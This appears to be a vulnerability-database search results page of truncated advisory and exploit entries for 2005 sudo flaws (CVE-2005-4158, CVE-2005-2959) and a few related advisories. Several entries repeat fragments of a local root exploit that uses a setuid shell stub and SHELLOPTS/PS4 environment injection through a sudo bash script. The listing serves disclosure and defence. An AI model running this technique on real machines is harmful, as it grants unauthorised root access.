4723 matches found
CVE-2005-4158
Sudo before 1.6.8 p12, when the Perl taint flag is off, does not clear the 1 PERLLIB, 2 PERL5LIB, and 3 PERL5OPT environment variables, which allows limited local users to cause a Perl script to include and execute arbitrary library files that have the same name as library files that are included...
CVE-2005-4158
CVE-2005-4158 affects sudo prior to version 1.6.8p12, where with Perl taint off the variables PERLLIB, PERL5LIB and PERL5OPT are not cleared, enabling a limited local user to influence which libraries a Perl script loads and potentially execute arbitrary code. Public disclosures (e.g., Debian DSA...
CVE-2005-4158
Sudo before 1.6.8 p12, when the Perl taint flag is off, does not clear the 1 PERLLIB, 2 PERL5LIB, and 3 PERL5OPT environment variables, which allows limited local users to cause a Perl script to include and execute arbitrary library files that have the same name as library files that are included...
Appfluent Database IDS < 2.1.0.103 (Env Variable) Local Exploit
No description provided by source. / $ An open security advisory 14 - Appfluent Database IDS Environment Variable Overflow 1: Bug Researcher: c0ntex - c0ntexbatgmail.com -+- www.open-security.org 2: Bug Released: December 07th 2005 3: Bug Impact Rate: Hi 4: Bug Scope Rate: Local root $ This...
Appfluent Database IDS 2.1.0.103 - Environment Variable Local Overflow
Appfluent Database IDS 2.1.0.103 - Environment Variable Local Overflow / $ An open security advisory 14 - Appfluent Database IDS Environment Variable Overflow 1: Bug Researcher: c0ntex - c0ntexbatgmail.com -+- www.open-security.org 2: Bug Released: December 07th 2005 3: Bug Impact Rate: Hi 4: Bug...
Mac OS X Multiple Vulnerabilities (Security Update 2005-009)
The remote host is running Apple Mac OS X, but lacks Security Update 2005-009. This security update contains fixes for the following applications : - Apache2 - Apachemodssl - CoreFoundation - curl - iodbcadmintool - OpenSSL - passwordserver - Safari - sudo - syslog C Tenable Network Security, Inc...
Sudo Perl 1.6.x - Environment Variable Handling Security Bypass
Sudo Perl 1.6.x - Environment Variable Handling Security Bypass source: https://www.securityfocus.com/bid/15394/info Sudo is prone to a security-bypass vulnerability that could lead to arbitrary code execution. This issue is due to an error in the application when handling the 'PERLLIB',...
[SA17534] Sudo Perl Environment Cleaning Privilege Escalation Vulnerability
TITLE: Sudo Perl Environment Cleaning Privilege Escalation Vulnerability SECUNIA ADVISORY ID: SA17534 VERIFY ADVISORY: http://secunia.com/advisories/17534/ CRITICAL: Less critical IMPACT: Privilege escalation WHERE: Local system SOFTWARE: Sudo 1.x http://secunia.com/product/3929/ DESCRIPTION: A...
Sudo Perl 1.6.x - Environment Variable Handling Security Bypass
source: https://www.securityfocus.com/bid/15394/info Sudo is prone to a security-bypass vulnerability that could lead to arbitrary code execution. This issue is due to an error in the application when handling the 'PERLLIB', 'PERL5LIB', and 'PERL5OPT' environment variables when tainting is ignore...
sudo168p10.sh.txt
exploit for adv : http://www.securityfocus.com/bid/15191/info Sudo local root escalation privilege vuln versions : sudo int main setuid0; system"/bin/sh"; % % gcc -o egg egg.c % setenv SHELLOPTS xtrace % setenv PS4 '$chown root:root egg' % sudo ./x.sh echo Getting root!! Getting root!! % ls -lisa...
Sudo 1.6.8p9 - SHELLOPTS/PS4 Environment Variables Privilege Escalation
Sudo local root escalation privilege vuln versions : sudo int main setuid0; system"/bin/sh"; % % gcc -o egg egg.c % setenv SHELLOPTS xtrace % setenv PS4 '$chown root:root egg' % sudo ./x.sh echo Getting root!! Getting root!! % ls -lisa egg 1198941 8 -rwxr-xr-x 1 root root 7428 2005-11-09 13:54 eg...
Sudo <= 1.6.8p9 (SHELLOPTS/PS4 ENV variables) Local Root Exploit
Exploit for linux platform in category local exploits ================================================================ Sudo int main setuid0; system"/bin/sh"; % % gcc -o egg egg.c % setenv SHELLOPTS xtrace % setenv PS4 '$chown root:root egg' % sudo ./x.sh echo Getting root!! Getting root!! % ls...
Sudo <= 1.6.8p9 (SHELLOPTS/PS4 ENV variables) Local Root Exploit
No description provided by source. Sudo local root escalation privilege vuln versions : sudo 1.6.8p10 by breno You need sudo access execution for some bash script Use csh shell to change SHELLOPTS env ie: %cat x.sh !/bin/bash -x echo "Getting root!!" % cat /etc/sudoers ... breno ALL=ALL...
Sudo 1.6.8p9 - SHELLOPTSPS4 Environment Variables Privilege Escalation
Sudo 1.6.8p9 - SHELLOPTSPS4 Environment Variables Privilege Escalation Sudo local root escalation privilege vuln versions : sudo int main setuid0; system"/bin/sh"; % % gcc -o egg egg.c % setenv SHELLOPTS xtrace % setenv PS4 '$chown root:root egg' % sudo ./x.sh echo Getting root!! Getting root!! %...
Mandrake Linux Security Advisory : sudo (MDKSA-2005:201)
Tavis Ormandy discovered that sudo does not perform sufficient environment cleaning; in particular the SHELLOPTS and PS4 variables are still passed to the program running as an alternate user which can result in the execution of arbitrary commands as the alternate user when a bash script is...
CVE-2005-2959
Incomplete blacklist vulnerability in sudo 1.6.8 and earlier allows local users to gain privileges via the 1 SHELLOPTS and 2 PS4 environment variables before executing a bash script on behalf of another user, which are not cleared even though other variables are...
CVE-2005-2959
Incomplete blacklist vulnerability in sudo 1.6.8 and earlier allows local users to gain privileges via the 1 SHELLOPTS and 2 PS4 environment variables before executing a bash script on behalf of another user, which are not cleared even though other variables are...
DEBIAN-CVE-2005-2959
Incomplete blacklist vulnerability in sudo 1.6.8 and earlier allows local users to gain privileges via the 1 SHELLOPTS and 2 PS4 environment variables before executing a bash script on behalf of another user, which are not cleared even though other variables are...
CVE-2005-2959
Incomplete blacklist vulnerability in sudo 1.6.8 and earlier allows local users to gain privileges via the 1 SHELLOPTS and 2 PS4 environment variables before executing a bash script on behalf of another user, which are not cleared even though other variables are...
[SECURITY] [DSA 870-1] New sudo packages fix arbitrary command execution
-------------------------------------------------------------------------- Debian Security Advisory DSA 870-1 [email protected] http://www.debian.org/security/ Martin Schulze October 25th, 2005 http://www.debian.org/security/faq -...